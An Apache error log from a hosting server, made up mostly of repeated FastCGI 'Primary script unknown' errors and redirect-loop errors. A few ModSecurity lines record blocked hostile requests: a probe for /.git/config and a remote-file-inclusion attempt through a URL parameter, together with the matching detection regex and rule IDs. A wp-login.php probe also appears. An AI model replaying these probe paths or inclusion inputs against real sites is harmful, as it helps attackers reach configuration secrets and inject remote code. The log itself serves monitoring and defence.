[Mon May 11 13:13:20.000632 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:20.104998 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:20.196777 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:20.290658 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:20.385968 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:20.591962 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:21.236111 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:21.331865 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:21.432193 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:21.523798 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:21.615327 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:21.963960 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:22.055280 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:22.180543 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:22.298105 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:22.390611 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:22.481838 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:22.629980 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:22.721554 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:22.814005 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:22.905306 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:23.081235 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:23.186374 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:23.294761 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:23.562675 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:23.653738 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:23.901126 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:24.007344 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:24.099739 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:24.199818 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:24.302028 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:24.410386 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:24.501609 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:24.598071 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:24.700588 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:24.792191 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:24.893814 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:25.026408 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:25.408265 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:25.603892 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:25.705827 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:25.798062 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:25.903380 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:25.997927 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:26.089571 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:26.181587 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:26.273140 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:26.476000 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:26.567819 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:26.669339 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:26.761938 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:26.853712 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:27.054650 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:27.637429 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:27.835525 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:27.928914 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:28.022494 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:28.123225 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:28.220438 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:28.589994 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:29.282060 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:29.396773 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:29.608276 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:29.704177 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:30.260141 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:30.359781 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:30.695446 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:30.789394 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:31.068116 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:31.251180 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:31.634269 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:31.906082 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:32.047508 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:32.139629 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:32.231520 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:32.937627 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:33.029178 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:33.121092 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:33.550493 2026] [:error] [pid 1254328:tid 1254347] [client 114.119.140.137:38697] File does not exist: /home/totalcloud/public_html/index.php, referer: https://totalcloud.fr/webshop?ccce=index&rp=%2Fknowledgebase%2F3%2FTelephonie&systpl=six&language=ukranian
[Mon May 11 13:13:33.576237 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:33.667730 2026] [proxy_fcgi:error] [pid 1254328:tid 1254331] [client 20.151.0.198:64471] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:34.893163 2026] [proxy_fcgi:error] [pid 1254212:tid 1254227] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:35.024959 2026] [proxy_fcgi:error] [pid 1254212:tid 1254227] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:35.313134 2026] [proxy_fcgi:error] [pid 1254212:tid 1254227] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:35.411134 2026] [proxy_fcgi:error] [pid 1254212:tid 1254227] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:35.507752 2026] [proxy_fcgi:error] [pid 1254212:tid 1254227] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:35.603928 2026] [proxy_fcgi:error] [pid 1254212:tid 1254227] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:35.973246 2026] [proxy_fcgi:error] [pid 1254212:tid 1254227] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:36.483480 2026] [proxy_fcgi:error] [pid 1254212:tid 1254227] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:36.579912 2026] [proxy_fcgi:error] [pid 1254212:tid 1254227] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:36.677350 2026] [proxy_fcgi:error] [pid 1254212:tid 1254227] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:36.774653 2026] [proxy_fcgi:error] [pid 1254212:tid 1254227] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:36.870942 2026] [proxy_fcgi:error] [pid 1254212:tid 1254227] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:36.970175 2026] [proxy_fcgi:error] [pid 1254212:tid 1254227] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:38.289425 2026] [proxy_fcgi:error] [pid 1254212:tid 1254227] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:38.388151 2026] [proxy_fcgi:error] [pid 1254212:tid 1254227] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:39.326078 2026] [proxy_fcgi:error] [pid 1254212:tid 1254227] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:39.425652 2026] [proxy_fcgi:error] [pid 1254212:tid 1254227] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:39.728509 2026] [proxy_fcgi:error] [pid 1254212:tid 1254227] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:39.827222 2026] [proxy_fcgi:error] [pid 1254212:tid 1254227] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:39.962235 2026] [proxy_fcgi:error] [pid 1254212:tid 1254227] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:40.683975 2026] [proxy_fcgi:error] [pid 1254212:tid 1254227] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:41.332761 2026] [proxy_fcgi:error] [pid 1254212:tid 1254227] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:41.432913 2026] [proxy_fcgi:error] [pid 1254212:tid 1254227] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:41.727530 2026] [proxy_fcgi:error] [pid 1254212:tid 1254227] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:41.834729 2026] [proxy_fcgi:error] [pid 1254212:tid 1254227] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:41.957788 2026] [proxy_fcgi:error] [pid 1254212:tid 1254227] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:42.065044 2026] [proxy_fcgi:error] [pid 1254212:tid 1254227] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:42.186726 2026] [proxy_fcgi:error] [pid 1254212:tid 1254227] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:42.313124 2026] [proxy_fcgi:error] [pid 1254212:tid 1254227] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:42.409572 2026] [proxy_fcgi:error] [pid 1254212:tid 1254227] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:42.514430 2026] [proxy_fcgi:error] [pid 1254212:tid 1254227] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:42.627250 2026] [proxy_fcgi:error] [pid 1254212:tid 1254227] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:42.723557 2026] [proxy_fcgi:error] [pid 1254212:tid 1254227] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:42.822962 2026] [proxy_fcgi:error] [pid 1254212:tid 1254227] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:42.919256 2026] [proxy_fcgi:error] [pid 1254212:tid 1254227] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:43.057989 2026] [proxy_fcgi:error] [pid 1254212:tid 1254227] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:43.174604 2026] [proxy_fcgi:error] [pid 1254212:tid 1254227] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:43.274705 2026] [proxy_fcgi:error] [pid 1254212:tid 1254227] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:43.372062 2026] [proxy_fcgi:error] [pid 1254212:tid 1254227] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:44.283882 2026] [proxy_fcgi:error] [pid 1254212:tid 1254227] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:44.394620 2026] [proxy_fcgi:error] [pid 1254212:tid 1254227] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:44.492927 2026] [proxy_fcgi:error] [pid 1254212:tid 1254227] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:44.591909 2026] [proxy_fcgi:error] [pid 1254212:tid 1254227] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:44.690725 2026] [proxy_fcgi:error] [pid 1254212:tid 1254227] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:44.788516 2026] [proxy_fcgi:error] [pid 1254212:tid 1254227] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:44.915781 2026] [proxy_fcgi:error] [pid 1254212:tid 1254227] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:45.013186 2026] [proxy_fcgi:error] [pid 1254212:tid 1254227] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:45.109639 2026] [proxy_fcgi:error] [pid 1254212:tid 1254227] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:45.213193 2026] [proxy_fcgi:error] [pid 1254212:tid 1254227] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:45.320507 2026] [proxy_fcgi:error] [pid 1254212:tid 1254227] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:13:45.417950 2026] [proxy_fcgi:error] [pid 1254212:tid 1254227] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:14:48.958598 2026] [:error] [pid 1254242:tid 1254262] [client 114.119.146.40:28527] File does not exist: /home/totalcloud/public_html/index.php, referer: https://totalcloud.fr/webshop?ccce=cart&systpl=six&language=norwegian
[Mon May 11 13:15:04.534043 2026] [security2:error] [pid 1254179:tid 1254191] [client 34.154.163.2:55412] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/.git/config"] [unique_id "agG6OGS6k_SCYd1AVZrKPAAAAQo"]
[Mon May 11 13:15:04.534293 2026] [security2:error] [pid 1254179:tid 1254191] [client 34.154.163.2:55412] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/.git/config"] [unique_id "agG6OGS6k_SCYd1AVZrKPAAAAQo"]
[Mon May 11 13:15:04.534551 2026] [security2:error] [pid 1254179:tid 1254191] [client 34.154.163.2:55412] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/.git/config"] [unique_id "agG6OGS6k_SCYd1AVZrKPAAAAQo"]
[Mon May 11 13:16:01.906583 2026] [security2:error] [pid 1254133:tid 1254142] [client 85.208.96.205:27518] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://159.89.210.161 found within ARGS:url: http://159.89.210.161/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agG6cRjZymfuKpjWXeiV-QAAAMY"]
[Mon May 11 13:16:01.909013 2026] [security2:error] [pid 1254133:tid 1254142] [client 85.208.96.205:27518] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agG6cRjZymfuKpjWXeiV-QAAAMY"]
[Mon May 11 13:16:01.909387 2026] [security2:error] [pid 1254133:tid 1254142] [client 85.208.96.205:27518] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agG6cRjZymfuKpjWXeiV-QAAAMY"]
[Mon May 11 13:16:11.005869 2026] [ssl:error] [pid 1254242:tid 1254264] (EAI 2)Name or service not known: [client 47.128.30.9:39262] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 13:16:11.005926 2026] [ssl:error] [pid 1254242:tid 1254264] AH01941: stapling_renew_response: responder error
[Mon May 11 13:16:11.958299 2026] [:error] [pid 1254179:tid 1254192] [client 114.119.146.171:31787] File does not exist: /home/totalcloud/public_html/index.php, referer: https://totalcloud.fr/tag/serveur-dedie-en-france/
[Mon May 11 13:16:25.057871 2026] [:error] [pid 1254242:tid 1254252] [client 148.113.8.170:42228] File does not exist: /home/cpcentre/public_html/wp-login.php
[Mon May 11 13:16:57.159834 2026] [core:error] [pid 1254328:tid 1254335] [client 20.239.192.136:8906] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:16:57.159966 2026] [core:error] [pid 1254328:tid 1254335] [client 20.239.192.136:8906] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:16:57.826501 2026] [core:error] [pid 1254179:tid 1254202] [client 20.239.192.136:8924] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:16:57.826538 2026] [core:error] [pid 1254179:tid 1254202] [client 20.239.192.136:8924] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:16:58.486245 2026] [core:error] [pid 1254212:tid 1254236] [client 20.239.192.136:8106] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:16:58.486287 2026] [core:error] [pid 1254212:tid 1254236] [client 20.239.192.136:8106] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:16:59.117135 2026] [core:error] [pid 1254242:tid 1254246] [client 20.239.192.136:9044] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:16:59.117191 2026] [core:error] [pid 1254242:tid 1254246] [client 20.239.192.136:9044] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:16:59.695638 2026] [core:error] [pid 1254212:tid 1254235] [client 20.239.192.136:11656] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:16:59.695675 2026] [core:error] [pid 1254212:tid 1254235] [client 20.239.192.136:11656] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:17:00.292215 2026] [core:error] [pid 1256241:tid 1256268] [client 20.239.192.136:6781] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:17:00.292250 2026] [core:error] [pid 1256241:tid 1256268] [client 20.239.192.136:6781] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
